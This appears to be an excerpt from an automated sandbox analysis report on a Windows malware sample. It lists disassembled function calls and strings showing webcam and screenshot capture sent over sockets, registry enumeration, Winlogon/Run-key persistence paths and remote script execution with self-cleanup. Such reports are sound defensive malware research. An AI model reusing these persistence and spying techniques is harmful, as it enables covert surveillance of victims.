                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,004151F0,?,?,00000000,CloseCamera,00000000,OpenCamera), ref: 00401DA9
                                • Part of subcall function 00402198: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00415A30,00415940,?,0040A446), ref: 004021A7
                                • Part of subcall function 00402198: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004021BA
                              • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,getcamframe), ref: 00401DCA
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001), ref: 00401E30
                              • atoi.MSVCRT ref: 00401E37
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,004151F0), ref: 00401F14
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401F1D
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401F2E
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@V01@@$D@2@@0@V?$basic_string@$?length@?$basic_string@$??8std@@FileHstd@@V12@$??4?$basic_string@?c_str@?$basic_string@?data@?$basic_string@?find@?$basic_string@?substr@?$basic_string@CloseCreateD@1@@HandleMappingV01@V10@0@V10@@Viewatoi
                              • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera$camdlldata$closecam$getcamframe$getcamsingleframe$initcamcap$nocamera$startcamcap
                              • API String ID: 1871107935-2220771084
                              • Opcode ID: 210e37a37f9e0c99d1be353a1af9e3b9112400b93629fd3c79e67747ea02e0e5
                              • Instruction ID: 183ee02595da0eeb8311e1689f08cbbe36985a9d478a6cb767cb9b2a83c2c828
                              • Opcode Fuzzy Hash: 210e37a37f9e0c99d1be353a1af9e3b9112400b93629fd3c79e67747ea02e0e5
                              • Instruction Fuzzy Hash: 23519732901215ABCB14EBE1EC0AAEE7B68EF81314B14447BF805B71E1DBBC4584CB9D
                              Function 0040DA55 Relevance: 58.0, APIs: 29, Strings: 4, Instructions: 234libraryloaderCOMMON
                              Download Yara Rule
                              APIs
                              • GdiplusStartup.GDIPLUS(00415ABC,?,00000000,00000000,00000000,00000000,76E50440,00415268,6A41AFB0), ref: 0040DA80
                              • LoadLibraryA.KERNEL32(Shlwapi.dll,0000000C,76E50440,00415268,6A41AFB0), ref: 0040DA94
                              • GetProcAddress.KERNEL32(00000000), ref: 0040DA9B
                              • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(76E50440,00415268,6A41AFB0), ref: 0040DAB3
                              • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040DABC
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040DAC6
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z.MSVCP60(?,00000000,?), ref: 0040DB68
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,00000000), ref: 0040DB86
                              • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,0000000A), ref: 0040DBA9
                              • _itoa.MSVCRT ref: 0040DBB0
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,initializescrcap,00415268,?,00415268,?,00415268,00415B18), ref: 0040DC15
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,00415268,00415B18), ref: 0040DC22
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,00415268,00415B18), ref: 0040DC2F
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,00415268,00415B18), ref: 0040DC3F
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,00415268,00415B18), ref: 0040DC4C
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040DC68
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040DC74
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040DC7D
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040DC86
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00415268), ref: 0040DC56
                                • Part of subcall function 00402198: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00415A30,00415940,?,0040A446), ref: 004021A7
                                • Part of subcall function 00402198: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004021BA
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,scrshot,00415268,?,00415268,?), ref: 0040DCAE
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,00415268,?), ref: 0040DCBB
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,00415268,?), ref: 0040DCC8
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,00415268,?), ref: 0040DCD2
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415268,?), ref: 0040DCE7
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415268,?), ref: 0040DCF0
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415268,?), ref: 0040DCF9
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415268,?), ref: 0040DD02
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415268,?), ref: 0040DD16
                                • Part of subcall function 00402109: socket.WS2_32(00000000,00000001,00000006), ref: 00402120
                                • Part of subcall function 00402168: connect.WS2_32(00415A30,00415A34,00000010), ref: 0040217E
                                • Part of subcall function 004021EB: CreateThread.KERNEL32(00000000,00000000,0040220A,00415AC0,00000000,00000000), ref: 00402200
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@D@2@@0@Hstd@@V?$basic_string@$V10@0@$?size@?$basic_string@$??0?$basic_string@?c_str@?$basic_string@V10@V10@@$AddressCreateD@1@@GdiplusLibraryLoadProcStartupThreadV01@@_itoaconnectsocket
                              • String ID: Shlwapi.dll$image/jpeg$initializescrcap$scrshot
                              • API String ID: 3965320395-4246769023
                              • Opcode ID: 3485ed177e6c1eb5429dcb5cd6c2bae28b102ccd90b4a18a1b4464b3ba66bd49
                              • Instruction ID: 37569ab505e31cf5d0ce7ce049b818f28185ad388a6b3e05f3e852d4fdd55162
                              • Opcode Fuzzy Hash: 3485ed177e6c1eb5429dcb5cd6c2bae28b102ccd90b4a18a1b4464b3ba66bd49
                              • Instruction Fuzzy Hash: 28816472900109AFDB14EBA0DD8ADEE777CFF54304F10417AF506A7191EA785E89CB68
                              Function 00409577 Relevance: 56.2, APIs: 30, Strings: 2, Instructions: 152registryCOMMON
                              Download Yara Rule
                              APIs
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,00415268,00000000), ref: 0040958B
                                • Part of subcall function 004094DE: ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,HKLM,00415268,?,00409C86), ref: 004094F1
                                • Part of subcall function 004094DE: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00409561
                              • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00409BF5), ref: 004095A9
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,regopened,00415268,00410844,00415268,00415A00,00415268,00415998,00415268,004159E8,00415268,00415A10), ref: 004095FC
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,004159E8,00415268,00415A10), ref: 00409609
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,00415268,00415A10), ref: 00409616
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,00415268,00415A10), ref: 00409623
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,00415268,00415A10), ref: 00409630
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00415268), ref: 0040963D
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040964A
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040965A
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040966A
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00409674
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040968C
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00409698
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004096A1
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004096AA
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004096B3
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004096BC
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004096C5
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004096CE
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004096D7
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00410668), ref: 004096E8
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00410668), ref: 004096F4
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00410668), ref: 00409700
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00410668), ref: 0040970C
                              • RegCloseKey.ADVAPI32(00409BF5), ref: 00409715
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,regmsg,00415268,00410848), ref: 00409737
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,00410848), ref: 00409741
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00410848), ref: 00409756
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00410848), ref: 0040975F
                                • Part of subcall function 0040926A: RegQueryInfoKeyA.ADVAPI32(004095BF,?,00000000,00000000,004095BF,?,?), ref: 004092D6
                                • Part of subcall function 0040926A: RegEnumKeyExA.ADVAPI32(004095BF,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00409305
                                • Part of subcall function 0040926A: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00410EC8,?), ref: 0040931B
                                • Part of subcall function 0040926A: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,?,00000000), ref: 0040932D
                                • Part of subcall function 0040926A: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,004095BF,00409BF5), ref: 0040933B
                                • Part of subcall function 0040926A: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,004095BF,00409BF5), ref: 00409344
                                • Part of subcall function 0040926A: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,004095BF,00409BF5), ref: 0040934D
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@D@2@@0@V?$basic_string@$Hstd@@$V10@0@$V01@$??4?$basic_string@$V10@@$??0?$basic_string@V01@@V10@$??8std@@CloseD@1@@EnumInfoOpenQueryY?$basic_string@
                              • String ID: regmsg$regopened
                              • API String ID: 661915744-492665732
                              • Opcode ID: 0ef7c05162cb41bc684b5b56ec50b8bb07652c3a5618f8f553b611841891aa8a
                              • Instruction ID: 760c7205af8a56aa8fc39ec9197364d881e5bd0ec4cdde1e626b63b7fd3aa999
                              • Opcode Fuzzy Hash: 0ef7c05162cb41bc684b5b56ec50b8bb07652c3a5618f8f553b611841891aa8a
                              • Instruction Fuzzy Hash: 875153B1900109ABDB04FBA0ED4FDDE776CEB55304F104176FA06B2191EE7C5E988B69
                              Function 00406339 Relevance: 54.4, APIs: 23, Strings: 8, Instructions: 158COMMON
                              Download Yara Rule
                              APIs
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(00406712,00410860,004157D0,00410860,00000001,0041580C,004157D0,0041580C,?,?,?,?,?,?,?,Ox@), ref: 00406360
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00410860,00000001,0041580C), ref: 0040638A
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,00410860,004157D0,00410860,00000001,0041580C,004157D0,0041580C), ref: 004064D8
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,00410860,00000001,0041580C,004157D0,0041580C), ref: 004064E2
                                • Part of subcall function 00408FDA: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,00406DFF,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 0040903C
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,00410860,00000001,0041580C,004157D0,0041580C), ref: 0040636A
                                • Part of subcall function 00408FDA: RegCreateKeyA.ADVAPI32(?,?,?), ref: 00408FE7
                                • Part of subcall function 00408FDA: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(80000002,004157F8,?,00406DFF,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 00408FF6
                                • Part of subcall function 00408FDA: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,00406DFF,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 00409000
                                • Part of subcall function 00408FDA: RegSetValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,00406DFF,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 00409013
                                • Part of subcall function 00408FDA: RegCloseKey.ADVAPI32(?,?,00406DFF,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 0040901E
                                • Part of subcall function 00408FDA: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,00406DFF,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 0040902D
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(00406712,00410860,004157D0,00410860,00000001,0041580C,004157D0,0041580C,?,?,?,?,?,?,?,Ox@), ref: 004063A4
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,00410860,00000001,0041580C,004157D0,0041580C), ref: 004063AE
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00410860,00000001,0041580C), ref: 004063CE
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(explorer.exe, ,?,00410860,004157D0,00410860,00000001,0041580C,004157D0,0041580C), ref: 004063F0
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,Ox@), ref: 004063FB
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(00000001,00000000), ref: 00406408
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 00406412
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00406434
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040643D
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00406446
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(C:\WINDOWS\system32\userinit.exe, ,?,00410860,004157D0,00410860,00000001,0041580C,004157D0,0041580C), ref: 00406468
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 00406473
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00406480
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 0040648A
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004064AC
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004064B5
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004064BE
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00410860,00000001,0041580C), ref: 00406502
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$D@2@@0@Hstd@@V?$basic_string@$??1?$basic_string@$V10@$V10@@$??0?$basic_string@D@1@@V10@0@$?c_str@?$basic_string@?size@?$basic_string@CloseCreateValue
                              • String ID: C:\WINDOWS\system32\userinit.exe, $Ox@$Shell$Software\Microsoft\Windows NT\CurrentVersion\Winlogon\$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Userinit$explorer.exe,
                              • API String ID: 3158786748-783391735
                              • Opcode ID: d483bb8dc5fae5a396b8efee62bfc1d20678eaede9f9809127a418cf3ad4d1dd
                              • Instruction ID: 3f221fffa98c3c74c31811f4ef3579c22c6f931b89917dd235009d3eae723281
                              • Opcode Fuzzy Hash: d483bb8dc5fae5a396b8efee62bfc1d20678eaede9f9809127a418cf3ad4d1dd
                              • Instruction Fuzzy Hash: A0417871D00219BBEB10BBA1DD4FEEF7F2DEB51314F00043AF90571182EAB95998C6A9
                              Function 0040D20D Relevance: 52.6, APIs: 24, Strings: 6, Instructions: 117filesynchronizationCOMMON
                              Download Yara Rule
                              APIs
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(004108CC,?,?,?,?), ref: 0040D228
                              • getenv.MSVCRT ref: 0040D234
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,00000000,?), ref: 0040D240
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040D24D
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D258
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D261
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000010,00000001), ref: 0040D26E
                              • ??0?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z.MSVCP60(00000000), ref: 0040D27B
                              • ?is_open@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QBE_NXZ.MSVCP60 ref: 0040D287
                              • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@@Z.MSVCP60(?,?), ref: 0040D2A0
                              • ?close@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 0040D2AD
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040D2CC
                              • ShellExecuteExA.SHELL32(0000003C), ref: 0040D2E9
                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0040D31F
                              • CloseHandle.KERNEL32(?), ref: 0040D328
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040D331
                              • DeleteFileA.KERNEL32(00000000), ref: 0040D338
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(remscriptexecd,?), ref: 0040D30D
                                • Part of subcall function 00402198: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00415A30,00415940,?,0040A446), ref: 004021A7
                                • Part of subcall function 00402198: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004021BA
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(remscriptsuccess,?,?,?,?,?), ref: 0040D352
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(remscripterr,?), ref: 0040D36A
                              • ??_D?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60(?,?,?,?), ref: 0040D380
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?), ref: 0040D389
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?), ref: 0040D392
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?), ref: 0040D39B
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: U?$char_traits@$V?$allocator@$D@std@@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@$D@1@@D@std@@@std@@$?c_str@?$basic_string@V?$basic_string@$D@2@@0@Hstd@@$??0?$basic_ofstream@??6std@@?close@?$basic_ofstream@?is_open@?$basic_ofstream@CloseD?$basic_ofstream@D@2@@0@@D@std@@@0@DeleteExecuteFileHandleObjectShellSingleV01@@V10@V10@0@V10@@V?$basic_ostream@Waitgetenv
                              • String ID: <$@$Temp$remscripterr$remscriptexecd$remscriptsuccess
                              • API String ID: 2271834883-3956447440
                              • Opcode ID: ad663a8d2a633417fe1706364678858063ddc7b1f600590b5d4ecc61305022c1
                              • Instruction ID: 40b226df9838ff9ebd93e372db10a445ae0d15efabd19c6d5a2c8874623cc937
                              • Opcode Fuzzy Hash: ad663a8d2a633417fe1706364678858063ddc7b1f600590b5d4ecc61305022c1
                              • Instruction Fuzzy Hash: 1F41307190011EEBDB14EFA0DD4DAEE7B78FF44305F10417AF502A21A0DBB85A89CB59
